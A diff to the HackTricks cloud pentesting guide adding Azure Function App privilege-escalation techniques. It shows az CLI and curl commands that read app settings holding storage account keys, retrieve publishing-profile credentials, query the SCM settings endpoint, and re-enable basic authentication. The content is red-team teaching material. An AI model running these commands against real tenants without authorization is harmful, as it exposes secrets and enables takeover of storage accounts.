GITBOOK-737: No subject

pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md

@@ -73,6 +73,72 @@ az functionapp keys set --resource-group <res_group> --key-name <key-name> --key
 ```
 {% endcode %}
 
+### Microsoft.Web/sites/config/list/action
+
+This permission allows to get the environmental variables of a function. Inside these variables it might be possible to find the default env variables **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which actually contains an **account key to access the blob storage of the function with FULL permissions**.
+
+{% code overflow="wrap" %}
+```bash
+az functionapp config appsettings list --name <func-name> --resource-group <res-group>
+```
+{% endcode %}
+
+
+
+### `Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)`
+
+This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**:
+
+```bash
+# Gte creds
+az functionapp deployment list-publishing-profiles \
+    --name basicauthenabled \
+    --resource-group Resource_Group_1 \
+    --output json
+```
+
+* **Method SCM**
+
+Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables:
+
+```bash
+# Get env variables values
+curl -u '<username>:<password>' \
+    https://<app-name>.scm.azurewebsites.net/api/settings -v
+```
+
+_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
+
+And these env variables contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account.
+
+
+
+If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
+
+{% code overflow="wrap" %}
+```bash
+# Enable basic authentication for SCM
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
+    --body '{
+        "properties": {
+            "allow": true
+        }
+    }'
+
+# Enable basic authentication for FTP
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
+    --body '{
+        "properties": {
+            "allow": true
+        }
+    }'
+```
+{% endcode %}
+
+
+
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
 Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

pentesting-cloud/azure-security/az-services/az-function-apps.md

@@ -48,7 +48,17 @@ This is very interesting from an attackers perspective as **write access over th
 This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Lambda function exposed to the Internet.
 {% endhint %}
 
-### **Function Apps support Managed Identities.**
+### **Environment Variables**
+
+it's possible to configure environment variables inside an app. Moreover, by default the env variables **`AzureWebJobsStorage`** and **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** (among others) are created. These are specially interesting because they **contain the account key to control with FULL permissions the storage account containing the data of the application**.
+
+### **Function Sandbox**
+
+Inside the sandbox the source code is located in **`/home/site/wwwroot`** in the file **`function_app.py`** (if python is used) the user running the code is **`app`** (without sudo permissions).
+
+
+
+### **Managed Identities**
 
 Moreover Function App might have certain endpoints that require a certain level of authentication, such as "admin" or "anonymous".\
 An attacker could try to access the **anonymous allowed endpoints** to bypass the restrictions and gain access to sensitive data or functionality.
@@ -81,10 +91,27 @@ Example to access a function API endpoint using a key:
 
 ## Enumeration
 
-```powershell
-# Get only Function Apps
-Get-AzFunctionApp
+{% code overflow="wrap" %}
+```bash
+# List all the functions
+az functionapp list
+
+# Get info of 1 funciton (although in the list you already get this info)
+az functionapp show --name <app-name> --resource-group <res-group>
+
+# Get env variables (and privesc tot he sorage account)
+az functionapp config appsettings list --name <app-name> --resource-group <res-group>
+
+# Check if a domain was assigned to a function app
+az functionapp config hostname list --webapp-name <app-name> --resource-group <res-group>
+
+# Get SSL certificates
+az functionapp config ssl list --resource-group <res-group>
+
+# Get network restrictions
+az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
 ```
+{% endcode %}
 
 ## Privilege Escalation